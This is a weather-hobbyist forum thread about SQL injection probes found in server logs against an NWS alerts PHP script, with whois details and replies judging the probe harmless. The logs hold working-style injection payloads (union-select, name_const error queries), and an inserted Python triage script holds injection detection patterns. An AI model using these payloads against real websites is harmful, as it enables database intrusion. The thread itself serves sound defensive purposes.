Author Topic: Attempted? Hack on NWS Alerts script  (Read 2755 times)


Maumelle Weather (Forecaster)
Attempted? Hack on NWS Alerts script
« on: January 15, 2017, 09:21:48 AM »
Curly, Ken, et al.,

Came across the following in my logs for yesterday:

Line 1857: 23.91.70.52 - - [14/Jan/2017:14:29:12 -0500] "GET /wxnws-details.php?a=ARZ042'\" HTTP/1.1" 200 24877 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; yplus 5.6.02b)" 0 0 "off:-:-" 164 1307212

Line 1858: 23.91.70.52 - - [14/Jan/2017:14:29:14 -0500] "GET /wxnws-details.php?a=ARZ042 HTTP/1.1" 200 24870 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 215 343855

Line 1859: 23.91.70.52 - - [14/Jan/2017:14:29:14 -0500] "GET /wxnws-details.php?a=ARZ0422121121121212.1 HTTP/1.1" 200 24915 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; InfoPath.1)" 0 0 "off:-:-" 182 347281

Line 1860: 23.91.70.52 - - [14/Jan/2017:14:29:15 -0500] "GET /wxnws-details.php?a=ARZ042%20and%201%3D1 HTTP/1.1" 200 24695 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 206 359951

Line 1861: 23.91.70.52 - - [14/Jan/2017:14:29:15 -0500] "GET /wxnws-details.php?a=ARZ042%20and%201%3E1 HTTP/1.1" 200 24671 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 229 368230

Line 1862: 23.91.70.52 - - [14/Jan/2017:14:29:16 -0500] "GET /wxnws-details.php?a=ARZ042%27%20and%20%27x%27%3D%27x HTTP/1.1" 200 24862 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 218 371431

Line 1863: 23.91.70.52 - - [14/Jan/2017:14:29:16 -0500] "GET /wxnws-details.php?a=ARZ042%27%20and%20%27x%27%3D%27y HTTP/1.1" 200 24687 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 0 "off:-:-" 247 346981

Line 1864: 23.91.70.52 - - [14/Jan/2017:14:29:17 -0500] "GET /wxnws-details.php?a=ARZ042\"%20and%20\"x\"%3D\"x HTTP/1.1" 200 24868 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)" 0 0 "off:-:-" 249 330620

Line 1865: 23.91.70.52 - - [14/Jan/2017:14:29:17 -0500] "GET /wxnws-details.php?a=ARZ042%22%20and%20%22x%22%3D%22y HTTP/1.1" 200 24671 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 241 344537

Line 1866: 23.91.70.52 - - [14/Jan/2017:14:29:18 -0500] "GET /wxnws-details.php?a=ARZ042%20AND%201=1 HTTP/1.1" 200 24917 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; dial" 0 0 "off:-:-" 157 362337

Line 1873: 23.91.70.52 - - [14/Jan/2017:14:29:19 -0500] "GET /wxnws-details.php?a=ARZ042999999.1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 HTTP/1.1" 200 24911 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; elertz 2.4.025; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 0 0 "off:-:-" 283 373269

Line 1874: 23.91.70.52 - - [14/Jan/2017:14:29:20 -0500] "GET /wxnws-details.php?a=ARZ04299999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x HTTP/1.1" 200 24880 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; SV1; snprtz|S04087544802137; .NET CLR 1.1.4322)" 0 0 "off:-:-" 274 351602

Line 1875: 23.91.70.52 - - [14/Jan/2017:14:29:20 -0500] "GET /wxnws-details.php?a=ARZ04299999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x HTTP/1.1" 200 25028 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; IEMB3; IEMB3; yplus 5.1.04b)" 0 0 "off:-:-" 300 348564

Line 1876: 23.91.70.52 - - [14/Jan/2017:14:29:21 -0500] "GET /wxnws-details.php?a=ARZ042%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1 HTTP/1.1" 200 24688 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; eMusic DLM/3; MSN Optimized;US; MSN Optimized;US)" 0 0 "off:-:-" 359 357790

Line 1877: 23.91.70.52 - - [14/Jan/2017:14:29:21 -0500] "GET /wxnws-details.php?a=ARZ042%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x HTTP/1.1" 200 24850 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" 0 0 "off:-:-" 394 343385

Line 1878: 23.91.70.52 - - [14/Jan/2017:14:29:22 -0500] "GET /wxnws-details.php?a=ARZ042%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x HTTP/1.1" 200 24871 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; acc=none; FunWebProducts; .NET CLR 1.1.4322)" 0 0 "off:-:-" 365 333894

Line 1879: 23.91.70.52 - - [14/Jan/2017:14:29:22 -0500] "GET /wxnws-details.php?a=ARZ042' HTTP/1.1" 200 24698 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; generic_01_01; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.3.04b)" 0 0 "off:-:-" 201 345922

Whois IP Information:

NetRange:       23.91.64.0 - 23.91.79.255
CIDR:           23.91.64.0/20
NetName:        ASO-239164-20
NetHandle:      NET-23-91-64-0-1
Parent:         NET23 (NET-23-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS36444, AS36024, AS30496
Organization:   A Small Orange LLC (SOL-21)
RegDate:        2013-08-29
Updated:        2014-06-13
Comment:        http://www.asmallorange.com
Comment:        877-283-2612
Comment:        email@asmallorange.com
Ref:            https://whois.arin.net/rest/net/NET-23-91-64-0-1
OrgName:        A Small Orange LLC
OrgId:          SOL-21
Address:        2500 Ridgepoint Drive
City:           Austin
StateProv:      TX
PostalCode:     78754
Country:        US
RegDate:        2012-06-11
Updated:        2014-10-28
Ref:            https://whois.arin.net/rest/org/SOL-21
For those who use this script, if you are able to check your server logs, please do. Plus, if you are able, add them to your .htaccess file.

This is the first time I've seen a deliberate attempt on the NWS Alerts script. Things like this are the reason I check the server logs daily. Needless to say, the CIDR was added to my .htaccess file.

John
GR2AE, GR3, Cumulus
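As an added example (not part of this post or of the NWS Alerts script), the check described above in code: a Python triage script that parses lines in the same Apache format as the excerpt, URL-decodes the `a` parameter, and flags every request whose value is not shaped like a zone code, then lists the IPs with enough hits to be worth a deny rule. The zone-code pattern (`ARZ042`: state, Z or C, three digits) and the shortened sample lines are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: three probe lines from the post (user-agent shortened) plus one benign request.
SAMPLE_LOG = r'''23.91.70.52 - - [14/Jan/2017:14:29:12 -0500] "GET /wxnws-details.php?a=ARZ042'\" HTTP/1.1" 200 24877 "-" "Mozilla/4.0" 0 0 "off:-:-" 164 1307212
23.91.70.52 - - [14/Jan/2017:14:29:15 -0500] "GET /wxnws-details.php?a=ARZ042%20and%201%3D1 HTTP/1.1" 200 24695 "-" "Mozilla/4.0" 0 0 "off:-:-" 206 359951
23.91.70.52 - - [14/Jan/2017:14:29:20 -0500] "GET /wxnws-details.php?a=ARZ04299999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x HTTP/1.1" 200 24880 "-" "Mozilla/4.0" 0 0 "off:-:-" 274 351602
198.51.100.7 - - [14/Jan/2017:15:01:02 -0500] "GET /wxnws-details.php?a=ARZ042 HTTP/1.1" 200 24870 "-" "Mozilla/5.0" 0 0 "off:-:-" 100 200000'''

# Apache combined-style prefix (client, ident, user, [time], "method path proto", status), and the
# assumed legitimate shape of "a": an NWS UGC code such as ARZ042 (state, Z or C, three digits).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^" ]+" (\d{3})')
ZONE_RE = re.compile(r"^[A-Z]{2}[CZ]\d{3}$")
# Coarse labels for what an out-of-spec value resembles; these aid triage, the verdict is ZONE_RE.
MARKERS = (
    ("quote-probe", re.compile(r"""['"]""")),
    ("tautology", re.compile(r"\b(?:and|or)\b\s+\S+\s*[=<>]\s*\S+", re.I)),
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("sql-comment", re.compile(r"--|/\*")),
)

def parse_line(line):
    """Return (ip, time, status, value of 'a') or None if the line does not parse."""
    if (m := LOG_RE.match(line)) is None:
        return None
    ip, when, _method, raw_path, status = m.groups()
    path = raw_path.replace('\\"', '"')  # Apache writes a literal quote inside the request as \"
    params = dict(parse_qsl(urlsplit(path).query, keep_blank_values=True))
    return ip, when, int(status), params.get("a")

def classify(value):
    """Names of the injection markers present in a decoded parameter value."""
    return [name for name, rx in MARKERS if rx.search(value)]

def scan(log_text):
    """Map each client IP to its requests whose 'a' value is not a well-formed zone code."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None or parsed[3] is None:
            continue
        ip, when, status, value = parsed
        if not ZONE_RE.match(value):
            findings[ip].append((when, status, value, classify(value)))
    return dict(findings)

def block_candidates(log_text, min_hits=3):
    """IPs with at least min_hits out-of-spec requests: review these before writing a deny rule."""
    return sorted(ip for ip, hits in scan(log_text).items() if len(hits) >= min_hits)
```

Run `scan(SAMPLE_LOG)` to see the decoded values per IP; the benign `ARZ042` request from the second address is not reported, because the allow-list pattern, not the marker list, decides.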

Jáchym (Meteotemplate Developer, Forecaster)
Re: Attempted? Hack on NWS Alerts script
« Reply #1 on: January 15, 2017, 10:00:06 AM »
Looks like an attempt for an SQL injection, however if this script is not connected to an SQL based db (which I think it isn't) and one that is not protected against this (hopefully everyone knows about this sort of attack), it should not do any harm.

In this particular case I think the script only uses the GET parameter to get the location for warnings, so if you send it commands like this, it will simply not find any warnings for this.

saratogaWX (Administrator, Forecaster; Saratoga, CA, USA Weather - free PHP scripts)
Re: Attempted? Hack on NWS Alerts script
« Reply #2 on: January 15, 2017, 11:13:55 AM »
Quote from: Jáchym
Looks like an attempt for an SQL injection, however if this script is not connected to an SQL based db (which I think it isn't) and one that is not protected against this (hopefully everyone knows about this sort of attack), it should not do any harm.

In this particular case I think the script only uses the GET parameter to get the location for warnings, so if you send it commands like this, it will simply not find any warnings for this.

I agree with Jáchym ... a 'rattling the doorknob' test. Since there's no SQL behind that script, the compromise attempt will fail.

I see this kind of thing on my site all the time from too many IPs to block.  I just consider it background noise. 
Ken True/Saratoga, CA, USA main site: saratoga-weather.org
Davis VP1+ FARS, Blitzortung RED, GRLevel3, WD, WL, VWS, Cumulus, Meteobridge
Free weather PHP scripts/website templates - update notifications on Twitter saratogaWXPHP

Maumelle Weather (Forecaster)
Re: Attempted? Hack on NWS Alerts script
« Reply #3 on: January 15, 2017, 11:26:33 AM »
Thanks for the information and explanation, Jáchym and Ken. Learned something new.

John
GR2AE, GR3, Cumulus
